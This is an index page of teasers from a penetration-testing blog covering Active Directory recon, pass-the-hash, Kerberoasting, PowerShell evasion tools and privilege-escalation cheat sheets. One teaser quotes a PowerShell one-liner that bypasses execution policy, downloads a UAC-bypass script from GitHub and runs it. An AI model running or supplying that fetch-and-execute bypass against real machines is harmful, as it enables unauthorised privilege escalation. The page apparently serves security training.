Cyber Security Research Blogs - Page 19 Of 25 - Blog On Advance InfoSec Concepts

AD Recon For Beginners

All Blog, AD exploitation & Post exploitation 11th May 202013th July 2021 blog_h4ck

List of tools for common AD recon rpclient enum4linux Adexplorer Jdxplorer RSAT nltest netdom Powershell ADmodule Powerview setspn crackmapexec bloodhound sc command wmic command netContinue readingAD Recon For Beginners

Thick client Testing

All Blog 6th May 202013th July 2021 blog_h4ck

Introduction A thick client is a computer application runs as an executable on the client’s system and connects to an application server or sometimes directlyContinue readingThick client Testing

Pass the hash: A Nightmare still alive!

All Blog, AD exploitation & Post exploitation 6th May 202013th July 2021 blog_h4ck

There are multiple ways to brute force on an NTLM NTLMV2 hash. Attackers have used the Pass-the-Hash (PtH) attack for over two decades. Its effectivenessContinue readingPass the hash: A Nightmare still alive!

Kerberoasting Common tools

AD exploitation & Post exploitation 4th May 202020th January 2021 blog_h4ck

Before going deeper into Kerberoasting lets understand some of the concepts firsts . The Kerberos authentication system is built on top of tickets served byContinue readingKerberoasting Common tools

Powershell Scripts Execute without Powershell

All Blog, AD exploitation & Post exploitation 21st March 202013th July 2021 Mr.x

In this blog, we will discover the best tool to run PowerShell scripts and commands without using powershell.exe PowerLine NPS — Not PowerShell PowerShdll PowerLessShellContinue readingPowershell Scripts Execute without Powershell

AD exploitation Powershell Cheatsheet

AD exploitation & Post exploitation, All Blog 9th March 202013th July 2021 blog_h4ck

Cheatsheet:- # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] powershell.exe -exec bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1’);Invoke-BypassUAC -Command ‘startContinue readingAD exploitation Powershell Cheatsheet

PowerUp Cheatsheet

AD exploitation & Post exploitation, All Blog 9th March 202013th July 2021 blog_h4ck

PowerUp.ps1 is a program that enables a user to perform quick checks against a Windows machine for any privilege escalation opportunities. It is not a comprehensiveContinue readingPowerUp Cheatsheet

Active Directory privilege escalation cheat sheet

Windows-Pentesting, AD exploitation & Post exploitation, All Blog 23rd February 202013th July 2021 Mr.x

Recon # Systeminfo systeminfo hostname # Especially good with hotfix info wmic qfe get Caption,Description,HotFixID,InstalledOn # What users/localgroups are on the machine? net users netContinue readingActive Directory privilege escalation cheat sheet

AWAE review

All Blog 21st February 202023rd February 2020 Mr.x

Summary Layout of AWAE is similar to the PWK training. You get a PDF textbook, a collection of videos, and access to the lab. InContinue readingAWAE review

Tools Allowed in OSCP

OSCP Study material, All Blog 19th February 202010th October 2023 blog_h4ck

PWK/OSCP Prep Discord Server ( https://discord.gg/ ) These are merely tools suggested by other users that are deemed “approved” for the exam. There will be some toolsContinue readingTools Allowed in OSCP